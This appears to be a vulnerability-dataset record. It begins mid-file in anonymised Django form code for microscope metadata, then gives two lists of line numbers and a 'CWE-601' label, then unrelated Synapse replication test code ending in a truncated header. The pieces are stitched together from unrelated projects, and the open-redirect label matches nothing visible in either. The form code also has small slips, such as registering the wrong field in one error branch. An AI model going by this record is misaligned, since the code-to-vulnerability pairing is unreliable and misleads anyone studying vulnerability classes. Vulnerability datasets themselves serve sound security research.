required=False,
)
FUNC_1(self.fields["wavelength"])
try:
if VAR_41.frequencyMultiplication is not None:
self.fields["frequencyMultiplication"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_41.id, "frequencyMultiplication"
),
}
),
initial=VAR_41.frequencyMultiplication,
label="Frequency Multiplication",
required=False,
)
else:
self.fields["frequencyMultiplication"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_41.id, "frequencyMultiplication"
),
}
),
label="Frequency Multiplication",
required=False,
)
FUNC_1(self.fields["frequencyMultiplication"])
except Exception:
self.fields["frequencyMultiplication"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Frequency Multiplication",
required=False,
)
FUNC_1(self.fields["frequencyMultiplication"])
try:
if VAR_41.tuneable is not None:
self.fields["tuneable"] = forms.ChoiceField(
VAR_36=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "tuneable", VAR_7=True
)
}
),
initial=VAR_41.tuneable,
required=False,
)
else:
self.fields["tuneable"] = forms.ChoiceField(
VAR_36=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "tuneable", VAR_7=True
)
}
),
required=False,
)
FUNC_1(self.fields["tuneable"])
except Exception:
self.fields["tuneable"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["tuneable"])
try:
if VAR_41.pulse is not None:
self.fields["pulse"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["pulses"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "pulse", VAR_7=True
)
}
),
initial=VAR_41.pulse,
required=False,
)
else:
self.fields["pulse"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["pulses"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "pulse", VAR_7=True
)
}
),
required=False,
)
FUNC_1(self.fields["pulse"])
except Exception:
self.fields["pulse"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["pulse"])
try:
if VAR_41.repetitionRate is not None:
self.fields["repetitionRate"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "repetitionRate"),
}
),
initial=VAR_41.repetitionRate.getValue(),
label=(
"Repetition rate (%VAR_23)" % VAR_41.repetitionRate.getSymbol()
),
required=False,
)
else:
self.fields["repetitionRate"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "repetitionRate"),
}
),
label="Repetition rate",
required=False,
)
FUNC_1(self.fields["repetitionRate"])
except Exception:
self.fields["repetitionRate"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Repetition rate",
required=False,
)
FUNC_1(self.fields["repetitionRate"])
try:
if VAR_41.pockelCell is not None:
self.fields["pockelCell"] = forms.ChoiceField(
VAR_36=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "pockelCell", VAR_7=True
)
}
),
initial=VAR_41.pockelCell,
label="Pockel Cell",
required=False,
)
else:
self.fields["pockelCell"] = forms.ChoiceField(
VAR_36=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "pockelCell", VAR_7=True
)
}
),
label="Pockel Cell",
required=False,
)
FUNC_1(self.fields["pockelCell"])
except Exception:
self.fields["pockelCell"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Pockel Cell",
required=False,
)
FUNC_1(self.fields["pockelCell"])
if (
VAR_42 is not None
and VAR_42.attenuation is not None
):
self.fields["attenuation"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_42.id, "attenuation"
),
}
),
initial=formatPercentFraction(VAR_42.attenuation),
label="Attenuation (%)",
required=False,
)
else:
self.fields["attenuation"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["attenuation"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"power",
"lstype",
"pump",
"lmedium",
"wavelength",
"frequencyMultiplication",
"tuneable",
"pulse",
"repetitionRate",
"pockelCell",
"attenuation",
]
class CLASS_20(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_20, self).__init__(*VAR_11, **VAR_12)
VAR_43 = VAR_12["initial"]["image"].getImagingEnvironment()
try:
if VAR_43.temperature is not None:
self.fields["temperature"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "temperature"
),
}
),
initial=VAR_43.temperature.getValue(),
label=("Temperature (%VAR_23)" % VAR_43.temperature.getSymbol()),
required=False,
)
else:
self.fields["temperature"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "temperature"
),
}
),
required=False,
)
FUNC_1(self.fields["temperature"])
except Exception:
self.fields["temperature"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["temperature"])
try:
if VAR_43.airPressure is not None:
self.fields["airPressure"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "airPressure"
),
}
),
initial=VAR_43.airPressure.getValue(),
label=("Air Pressure (%VAR_23)" % VAR_43.airPressure.getSymbol()),
required=False,
)
else:
self.fields["airPressure"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "airPressure"
),
}
),
label="Air Pressure",
required=False,
)
FUNC_1(self.fields["airPressure"])
except Exception:
self.fields["airPressure"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
label="Air Pressure",
initial="N/A",
required=False,
)
FUNC_1(self.fields["airPressure"])
try:
if VAR_43.humidity is not None:
self.fields["humidity"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "humidity"
),
}
),
initial=VAR_43.humidity,
required=False,
)
else:
self.fields["humidity"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "humidity"
),
}
),
required=False,
)
FUNC_1(self.fields["humidity"])
except Exception:
self.fields["humidity"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["humidity"])
try:
if VAR_43.co2percent is not None:
self.fields["co2percent"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "co2percent"
),
}
),
initial=VAR_43.co2percent,
label="CO2 (%)",
required=False,
)
else:
self.fields["co2percent"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "co2percent"
),
}
),
label="CO2 (%)",
required=False,
)
FUNC_1(self.fields["co2percent"])
except Exception:
self.fields["co2percent"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="CO2 (%)",
required=False,
)
FUNC_1(self.fields["co2percent"])
self.fields.keyOrder = ["airPressure", "co2percent", "humidity", "temperature"]
class CLASS_21(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_21, self).__init__(*VAR_11, **VAR_12)
try:
if VAR_12["initial"]["image"].getStageLabel() is not None:
self.fields["positionx"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "positionx"
),
}
),
initial=VAR_12["initial"]["image"].getStageLabel().positionx,
label="Position X",
required=False,
)
else:
self.fields["positionx"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "positionx"
),
}
),
label="Position X",
required=False,
)
FUNC_1(self.fields["positionx"])
except Exception:
self.fields["positionx"] = forms.CharField(
max_length=100,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Position X",
required=False,
)
FUNC_1(self.fields["positionx"])
try:
if VAR_12["initial"]["image"].getStageLabel() is not None:
self.fields["positiony"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "positiony"
),
}
),
initial=VAR_12["initial"]["image"].getStageLabel().positiony,
label="Position Y",
required=False,
)
else:
self.fields["positiony"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "positiony"
),
}
),
label="Position Y",
required=False,
)
FUNC_1(self.fields["positiony"])
except Exception:
self.fields["positiony"] = forms.CharField(
max_length=100,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Position Y",
required=False,
)
FUNC_1(self.fields["positionx"])
try:
if VAR_12["initial"]["image"].getStageLabel() is not None:
self.fields["positionz"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "positionz"
),
}
),
initial=VAR_12["initial"]["image"].getStageLabel().positionz,
label="Position Z",
required=False,
)
else:
self.fields["positionz"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "positionz"
),
}
),
label="Position Z",
required=False,
)
FUNC_1(self.fields["positionz"])
except Exception:
self.fields["positionz"] = forms.CharField(
max_length=100,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Position Z",
required=False,
)
FUNC_1(self.fields["positionz"])
self.fields.keyOrder = ["positionx", "positiony", "positionz"]
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
23,
24,
25,
29,
34,
43,
45,
46,
47,
48,
49,
50,
52,
58,
64,
65,
66,
67,
68,
69,
71,
73,
74,
78,
98,
108,
109,
110,
128,
129,
133,
145,
146,
148,
154,
155,
157,
159,
160,
162,
166,
167,
175,
178,
194,
212,
230,
248,
264,
284,
300,
316,
317,
322,
325,
327,
337,
338,
341,
345,
346,
348,
349,
358,
360,
361,
364,
365,
404,
405,
420,
421,
422,
423,
424,
425,
432,
434,
435,
440,
441,
445,
446,
447,
448,
480,
481,
518,
519,
556,
557,
594,
595,
632,
633,
667,
668,
706,
707,
748,
749,
787,
788,
825,
838,
839,
843,
844,
882,
883,
921,
922,
965,
966,
1007,
1009,
1010,
1014,
1015,
1053,
1054,
1092,
1093,
1134,
1135,
1176,
1177,
1215,
1223,
1224,
1228,
1229,
1267,
1268,
1306,
1307,
1348,
1349,
1393,
1394,
1437,
1438,
1481,
1482,
1522,
1523,
1565,
1566,
1600,
1609,
1610,
1654,
1655,
1691,
1705,
1706,
1708,
1714,
1717,
1718,
1719,
1720,
1763,
1764,
1806,
1807,
1850,
1867,
1868,
1872,
1873,
1874,
1875,
1913,
1914,
1952,
1953,
1994,
1995,
2036,
2037,
2078,
2079,
2117,
2118,
2162,
2163,
2204,
2205,
2246,
2247,
2288,
2289,
2332,
2346,
2347,
2351,
2354,
2355,
2389,
2390,
2424,
2425,
2459,
2460,
2461,
2495,
2496,
2530,
2531,
2571,
2572,
2620,
2621,
2671,
2672,
2706,
2707,
2744,
2745,
2782,
2783,
2817,
2832,
2833,
2835,
2841,
2844,
2849,
2851,
2852,
2886,
2887,
2921,
2922,
2959,
2960,
2997,
2998,
3033,
3034,
3075,
3076,
3078,
3090,
3098,
3099,
3140,
3141,
3194,
3195,
3236,
3237,
3273,
3274,
3312,
3313,
3352,
3353,
3392,
3393,
3420,
3438,
3439,
3443,
3444,
3445,
3447,
3486,
3487,
3528,
3529,
3567,
3568,
3609,
3611,
3612,
3616,
3617,
3618,
3619,
3660,
3661,
3702,
3703,
3744,
3746,
169,
170,
171,
172,
173,
174,
319,
320,
321,
340
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
23,
24,
25,
29,
34,
42,
44,
45,
46,
47,
48,
49,
51,
57,
63,
64,
65,
66,
67,
68,
70,
72,
73,
77,
97,
107,
108,
109,
127,
128,
130,
136,
137,
139,
141,
142,
144,
148,
149,
157,
160,
176,
194,
212,
230,
246,
266,
282,
298,
299,
304,
307,
309,
319,
320,
323,
327,
328,
330,
331,
340,
342,
343,
346,
347,
386,
387,
402,
403,
404,
405,
406,
407,
414,
416,
417,
422,
423,
427,
428,
429,
430,
462,
463,
500,
501,
538,
539,
576,
577,
614,
615,
649,
650,
688,
689,
730,
731,
769,
770,
807,
820,
821,
825,
826,
864,
865,
903,
904,
947,
948,
989,
991,
992,
996,
997,
1035,
1036,
1074,
1075,
1116,
1117,
1158,
1159,
1197,
1205,
1206,
1210,
1211,
1249,
1250,
1288,
1289,
1330,
1331,
1375,
1376,
1419,
1420,
1463,
1464,
1504,
1505,
1547,
1548,
1582,
1591,
1592,
1636,
1637,
1673,
1687,
1688,
1690,
1696,
1699,
1700,
1701,
1702,
1745,
1746,
1788,
1789,
1832,
1849,
1850,
1854,
1855,
1856,
1857,
1895,
1896,
1934,
1935,
1976,
1977,
2018,
2019,
2060,
2061,
2099,
2100,
2144,
2145,
2186,
2187,
2228,
2229,
2270,
2271,
2314,
2328,
2329,
2333,
2336,
2337,
2371,
2372,
2406,
2407,
2441,
2442,
2443,
2477,
2478,
2512,
2513,
2553,
2554,
2602,
2603,
2653,
2654,
2688,
2689,
2726,
2727,
2764,
2765,
2799,
2814,
2815,
2817,
2823,
2826,
2831,
2833,
2834,
2868,
2869,
2903,
2904,
2941,
2942,
2979,
2980,
3015,
3016,
3057,
3058,
3060,
3072,
3080,
3081,
3122,
3123,
3176,
3177,
3218,
3219,
3255,
3256,
3294,
3295,
3334,
3335,
3374,
3375,
3402,
3420,
3421,
3425,
3426,
3427,
3429,
3468,
3469,
3510,
3511,
3549,
3550,
3591,
3593,
3594,
3598,
3599,
3600,
3601,
3642,
3643,
3684,
3685,
3726,
3728,
151,
152,
153,
154,
155,
156,
301,
302,
303,
322
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2019 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import Any, Callable, List, Optional, Tuple
import attr
from twisted.internet.interfaces import IConsumer, IPullProducer, IReactorTime
from twisted.internet.protocol import Protocol
from twisted.internet.task import LoopingCall
from twisted.web.http import HTTPChannel
from synapse.app.generic_worker import (
GenericWorkerReplicationHandler,
GenericWorkerServer,
)
from synapse.http.server import JsonResource
from synapse.http.site import SynapseRequest, SynapseSite
from synapse.replication.http import ReplicationRestResource, streams
from synapse.replication.tcp.handler import ReplicationCommandHandler
from synapse.replication.tcp.protocol import ClientReplicationStreamProtocol
from synapse.replication.tcp.resource import ReplicationStreamProtocolFactory
from synapse.server import HomeServer
from synapse.util import Clock
from tests import unittest
from tests.server import FakeTransport
try:
import hiredis
except ImportError:
hiredis = None
logger = logging.getLogger(__name__)
class BaseStreamTestCase(unittest.HomeserverTestCase):
"""Base class for tests of the replication streams"""
# hiredis is an optional dependency so we don't want to require it for running
# the tests.
if not hiredis:
skip = "Requires hiredis"
servlets = [
streams.register_servlets,
]
def prepare(self, reactor, clock, hs):
# build a replication server
server_factory = ReplicationStreamProtocolFactory(hs)
self.streamer = hs.get_replication_streamer()
self.server = server_factory.buildProtocol(None)
# Make a new HomeServer object for the worker
self.reactor.lookups["testserv"] = "1.2.3.4"
self.worker_hs = self.setup_test_homeserver(
http_client=None,
homeserver_to_use=GenericWorkerServer,
config=self._get_worker_hs_config(),
reactor=self.reactor,
)
# Since we use sqlite in memory databases we need to make sure the
# databases objects are the same.
self.worker_hs.get_datastore().db_pool = hs.get_datastore().db_pool
self.test_handler = self._build_replication_data_handler()
self.worker_hs._replication_data_handler = self.test_handler
repl_handler = ReplicationCommandHandler(self.worker_hs)
self.client = ClientReplicationStreamProtocol(
self.worker_hs, "client", "test", clock, repl_handler,
)
self._client_transport = None
self._server_transport = None
def _get_worker_hs_config(self) -> dict:
config = self.default_config()
config["worker_app"] = "synapse.app.generic_worker"
config["worker_replication_host"] = "testserv"
config["worker_replication_http_port"] = "8765"
return config
def _build_replication_data_handler(self):
return TestReplicationDataHandler(self.worker_hs)
def reconnect(self):
if self._client_transport:
self.client.close()
if self._server_transport:
self.server.close()
self._client_transport = FakeTransport(self.server, self.reactor)
self.client.makeConnection(self._client_transport)
self._server_transport = FakeTransport(self.client, self.reactor)
self.server.makeConnection(self._server_transport)
def disconnect(self):
if self._client_transport:
self._client_transport = None
self.client.close()
if self._server_transport:
self._server_transport = None
self.server.close()
def replicate(self):
"""Tell the master side of replication that something has happened, and then
wait for the replication to occur.
"""
self.streamer.on_notifier_poke()
self.pump(0.1)
def handle_http_replication_attempt(self) -> SynapseRequest:
"""Asserts that a connection attempt was made to the master HS on the
HTTP replication port, then proxies it to the master HS object to be
handled.
Returns:
The request object received by master HS.
"""
# We should have an outbound connection attempt.
clients = self.reactor.tcpClients
self.assertEqual(len(clients), 1)
(host, port, client_factory, _timeout, _bindAddress) = clients.pop(0)
self.assertEqual(host, "1.2.3.4")
self.assertEqual(port, 8765)
# Set up client side protocol
client_protocol = client_factory.buildProtocol(None)
request_factory = OneShotRequestFactory()
# Set up the server side protocol
channel = _PushHTTPChannel(self.reactor)
channel.requestFactory = request_factory
channel.site = self.site
# Connect client to server and vice versa.
client_to_server_transport = FakeTransport(
channel, self.reactor, client_protocol
)
client_protocol.makeConnection(client_to_server_transport)
server_to_client_transport = FakeTransport(
client_protocol, self.reactor, channel
)
channel.makeConnection(server_to_client_transport)
# The request will now be processed by `self.site` and the response
# streamed back.
self.reactor.advance(0)
# We tear down the connection so it doesn't get reused without our
# knowledge.
server_to_client_transport.loseConnection()
client_to_server_transport.loseConnection()
return request_factory.request
def assert_request_is_get_repl_stream_updates(
self, request: SynapseRequest, stream_name: str
):
"""Asserts that the given request is a HTTP replication request for
fetching updates for given stream.
"""
self.assertRegex(
request.path,
br"^/_synapse/replication/get_repl_stream_updates/%s/[^/]+$"
% (stream_name.encode("ascii"),),
)
self.assertEqual(request.method, b"GET")
class BaseMultiWorkerStreamTestCase(unittest.HomeserverTestCase):
"""Base class for tests running multiple workers.
Automatically handle HTTP replication requests from workers to master,
unlike `BaseStreamTestCase`.
"""
servlets = [] # type: List[Callable[[HomeServer, JsonResource], None]]
def setUp(self):
super().setUp()
# build a replication server
self.server_factory = ReplicationStreamProtocolFactory(self.hs)
self.streamer = self.hs.get_replication_streamer()
# Fake in memory Redis server that servers can connect to.
self._redis_server = FakeRedisPubSubServer()
store = self.hs.get_datastore()
self.database_pool = store.db_pool
self.reactor.lookups["testserv"] = "1.2.3.4"
self.reactor.lookups["localhost"] = "127.0.0.1"
# A map from a HS instance to the associated HTTP Site to use for
# handling inbound HTTP requests to that instance.
self._hs_to_site = {self.hs: self.site}
if self.hs.config.redis.redis_enabled:
# Handle attempts to connect to fake redis server.
self.reactor.add_tcp_client_callback(
"localhost", 6379, self.connect_any_redis_attempts,
)
self.hs.get_tcp_replication().start_replication(self.hs)
# When we see a connection attempt to the master replication listener we
# automatically set up the connection. This is so that tests don't
# manually have to go and explicitly set it up each time (plus sometimes
# it is impossible to write the handling explicitly in the tests).
#
# Register the master replication listener:
self.reactor.add_tcp_client_callback(
"1.2.3.4",
8765,
lambda: self._handle_http_replication_attempt(self.hs, 8765),
)
def create_test_resource(self):
"""Overrides `HomeserverTestCase.create_test_resource`.
"""
# We override this so that it automatically registers all the HTTP
# replication servlets, without having to explicitly do that in all
# subclassses.
resource = ReplicationRestResource(self.hs)
for servlet in self.servlets:
servlet(self.hs, resource)
return resource
def make_worker_hs(
self, worker_app: str, extra_config: dict = {}, **kwargs
) -> HomeServer:
"""Make a new worker HS instance, correctly connecting replcation
stream to the master HS.
Args:
worker_app: Type of worker, e.g. `synapse.app.federation_sender`.
extra_config: Any extra config to use for this instances.
**kwargs: Options that get passed to `self.setup_test_homeserver`,
useful to e.g. pass some mocks for things like `http_client`
Returns:
The new worker HomeServer instance.
"""
config = self._get_worker_hs_config()
config["worker_app"] = worker_app
config.update(extra_config)
worker_hs = self.setup_test_homeserver(
homeserver_to_use=GenericWorkerServer,
config=config,
reactor=self.reactor,
**kwargs,
)
# If the instance is in the `instance_map` config then workers may try
# and send HTTP requests to it, so we register it with
# `_handle_http_replication_attempt` like we do with the master HS.
instance_name = worker_hs.get_instance_name()
instance_loc = worker_hs.config.worker.instance_map.get(instance_name)
if instance_loc:
# Ensure the host is one that has a fake DNS entry.
if instance_loc.host not in self.reactor.lookups:
raise Exception(
"Host does not have an IP for instance_map[%r].host = %r"
% (instance_name, instance_loc.host,)
)
self.reactor.add_tcp_client_callback(
self.reactor.lookups[instance_loc.host],
instance_loc.port,
lambda: self._handle_http_replication_attempt(
worker_hs, instance_loc.port
),
)
store = worker_hs.get_datastore()
store.db_pool._db_pool = self.database_pool._db_pool
# Set up TCP replication between master and the new worker if we don't
# have Redis support enabled.
if not worker_hs.config.redis_enabled:
repl_handler = ReplicationCommandHandler(worker_hs)
client = ClientReplicationStreamProtocol(
worker_hs, "client", "test", self.clock, repl_handler,
)
server = self.server_factory.buildProtocol(None)
client_transport = FakeTransport(server, self.reactor)
client.makeConnection(client_transport)
server_transport = FakeTransport(client, self.reactor)
server.makeConnection(server_transport)
# Set up a resource for the worker
resource = ReplicationRestResource(worker_hs)
for servlet in self.servlets:
servlet(worker_hs, resource)
self._hs_to_site[worker_hs] = SynapseSite(
logger_name="synapse.access.http.fake",
site_tag="{}-{}".format(
worker_hs.config.server.server_name, worker_hs.get_instance_name()
),
config=worker_hs.config.server.listeners[0],
resource=resource,
server_version_string="1",
)
if worker_hs.config.redis.redis_enabled:
worker_hs.get_tcp_replication().start_replication(worker_hs)
return worker_hs
def _get_worker_hs_config(self) -> dict:
config = self.default_config()
config["worker_replication_host"] = "testserv"
config["worker_replication_http_port"] = "8765"
return config
def replicate(self):
"""Tell the master side of replication that something has happened, and then
wait for the replication to occur.
"""
self.streamer.on_notifier_poke()
self.pump()
def _handle_http_replication_attempt(self, hs, repl_port):
"""Handles a connection attempt to the given HS replication HTTP
listener on the given port.
"""
# We should have at least one outbound connection attempt, where the
# last is one to the HTTP repication IP/port.
clients = self.reactor.tcpClients
self.assertGreaterEqual(len(clients), 1)
(host, port, client_factory, _timeout, _bindAddress) = clients.pop()
self.assertEqual(host, "1.2.3.4")
self.assertEqual(port, repl_port)
# Set up client side protocol
client_protocol = client_factory.buildProtocol(None)
request_factory = OneShotRequestFactory()
# Set up the server side protocol
channel = _PushHTTPChannel(self.reactor)
channel.requestFactory = request_factory
channel.site = self._hs_to_site[hs]
# Connect client to server and vice versa.
client_to_server_transport = FakeTransport(
channel, self.reactor, client_protocol
)
client_protocol.makeConnection(client_to_server_transport)
server_to_client_transport = FakeTransport(
client_protocol, self.reactor, channel
)
channel.makeConnection(server_to_client_transport)
# Note: at this point we've wired everything up, but we need to return
# before the data starts flowing over the connections as this is called
# inside `connecTCP` before the connection has been passed back to the
# code that requested the TCP connection.
def connect_any_redis_attempts(self):
"""If redis is enabled we need to deal with workers connecting to a
redis server. We don't want to use a real Redis server so we use a
fake one.
"""
clients = self.reactor.tcpClients
self.assertEqual(len(clients), 1)
(host, port, client_factory, _timeout, _bindAddress) = clients.pop(0)
self.assertEqual(host, "localhost")
self.assertEqual(port, 6379)
client_protocol = client_factory.buildProtocol(None)
server_protocol = self._redis_server.buildProtocol(None)
client_to_server_transport = FakeTransport(
server_protocol, self.reactor, client_protocol
)
client_protocol.makeConnection(client_to_server_transport)
server_to_client_transport = FakeTransport(
client_protocol, self.reactor, server_protocol
)
server_protocol.makeConnection(server_to_client_transport)
return client_to_server_transport, server_to_client_transport
class TestReplicationDataHandler(GenericWorkerReplicationHandler):
"""Drop-in for ReplicationDataHandler which just collects RDATA rows"""
def __init__(self, hs: HomeServer):
super().__init__(hs)
# list of received (stream_name, token, row) tuples
self.received_rdata_rows = [] # type: List[Tuple[str, int, Any]]
async def on_rdata(self, stream_name, instance_name, token, rows):
await super().on_rdata(stream_name, instance_name, token, rows)
for r in rows:
self.received_rdata_rows.append((stream_name, token, r))
@attr.s()
class OneShotRequestFactory:
"""A simple request factory that generates a single `SynapseRequest` and
stores it for future use. Can only be used once.
"""
request = attr.ib(default=None)
def __call__(self, *args, **kwargs):
assert self.request is None
self.request = SynapseRequest(*args, **kwargs)
return self.request
class _PushHTTPChannel(HTTPChannel):
"""A HTTPChannel that wraps pull producers to push producers.
This is a hack to get around the fact that HTTPChannel transparently wraps a
pull producer (which is what Synapse uses to reply to requests) with
`_PullToPush` to convert it to a push producer. Unfortunately `_PullToPush`
uses the standard reactor rather than letting us use our test reactor, which
makes it very hard to test.
"""
def __init__(self, reactor: IReactorTime):
super().__init__()
self.reactor = reactor
self._pull_to_push_producer = None # type: Optional[_PullToPushProducer]
def registerProducer(self, producer, streaming):
# Convert pull producers to push producer.
if not streaming:
self._pull_to_push_producer = _PullToPushProducer(
self.reactor, producer, self
)
producer = self._pull_to_push_producer
super().registerProducer(producer, True)
def unregisterProducer(self):
if self._pull_to_push_producer:
# We need to manually stop the _PullToPushProducer.
self._pull_to_push_producer.stop()
def checkPersistence(self, request, version):
"""Check whether the connection can be re-used
"""
# We hijack this to always say no for ease of wiring stuff up in
# `handle_http_replication_attempt`.
request.responseHeaders.setRawHeaders(b"connection", [b"close"])
return False
class _PullToPushProducer:
"""A push producer that wraps a pull producer.
"""
def __init__(
self, reactor: IReactorTime, producer: IPullProducer, consumer: IConsumer
):
self._clock = Clock(reactor)
self._producer = producer
self._consumer = consumer
# While running we use a looping call with a zero delay to call
# resumeProducing on given producer.
self._looping_call = None # type: Optional[LoopingCall]
# We start writing next reactor tick.
self._start_loop()
def _start_loop(self):
"""Start the looping call to
"""
if not self._looping_call:
# Start a looping call which runs every tick.
self._looping_call = self._clock.looping_call(self._run_once, 0)
def stop(self):
"""Stops calling resumeProducing.
"""
if self._looping_call:
self._looping_call.stop()
self._looping_call = None
def pauseProducing(self):
"""Implements IPushProducer
"""
self.stop()
def resumeProducing(self):
"""Implements IPushProducer
"""
self._start_loop()
def stopProducing(self):
"""Implements IPushProducer
"""
self.stop()
self._producer.stopProducing()
def _run_once(self):
"""Calls resumeProducing on producer once.
"""
try:
self._producer.resumeProducing()
except Exception:
logger.exception("Failed to call resumeProducing")
try:
self._consumer.unregisterProducer()
except Exception:
pass
self.stopProducing()
class FakeRedisPubSubServer:
"""A fake Redis server for pub/sub.
"""
def __init__(self):
self._subscribers = set()
def add_subscriber(self, conn):
"""A connection has called SUBSCRIBE
"""
self._subscribers.add(conn)
def remove_subscriber(self, conn):
"""A connection has called UNSUBSCRIBE
"""
self._subscribers.discard(conn)
def publish(self, conn, channel, msg) -> int:
"""A connection want to publish a message to subscribers.
"""
for sub in self._subscribers:
sub.send(["message", channel, msg])
return len(self._subscribers)
def buildProtocol(self, addr):
return FakeRedisPubSubProtocol(self)
class FakeRedisPubSubProtocol(Protocol):
"""A connection from a client talking to the fake Redis server.
"""
def __init__(self, server: FakeRedisPubSubServer):
self._server = server
self._reader = hiredis.Reader()
def dataReceived(self, data):
self._reader.feed(data)
# We might get multiple messages in one packet.
while True:
msg = self._reader.gets()
if msg is False:
# No more messages.
return
if not isinstance(msg, list):
# Inbound commands should always be a list
raise Exception("Expected redis list")
self.handle_command(msg[0], *msg[1:])
def handle_command(self, command, *args):
"""Received a Redis command from the client.
"""
# We currently only support pub/sub.
if command == b"PUBLISH":
channel, message = args
num_subscribers = self._server.publish(self, channel, message)
self.send(num_subscribers)
elif command == b"SUBSCRIBE":
(channel,) = args
self._server.add_subscriber(self)
self.send(["subscribe", channel, 1])
else:
raise Exception("Unknown command")
def send(self, msg):
"""Send a message back to the client.
"""
raw = self.encode(msg).encode("utf-8")
self.transport.write(raw)
self.transport.flush()
def encode(self, obj):
"""Encode an object to its Redis format.
Supports: strings/bytes, integers and list/tuples.
"""
if isinstance(obj, bytes):
# We assume bytes are just unicode strings.
obj = obj.decode("utf-8")
if isinstance(obj, str):
return "${len}\r\n{str}\r\n".format(len=len(obj), str=obj)
if isinstance(obj, int):
return ":{val}\r\n".format(val=obj)
if isinstance(obj, (list, tuple)):
items = "".join(self.encode(a) for a in obj)
return "*{len}\r\n{items}".format(len=len(obj), items=items)
raise Exception("Unrecognized type for encoding redis: %r: %r", type(obj), obj)
def connectionLost(self, reason):
self._server.remove_subscriber(self)
| # -*- coding: utf-8 -*-
# Copyright 2019 New Vector Ltd
#
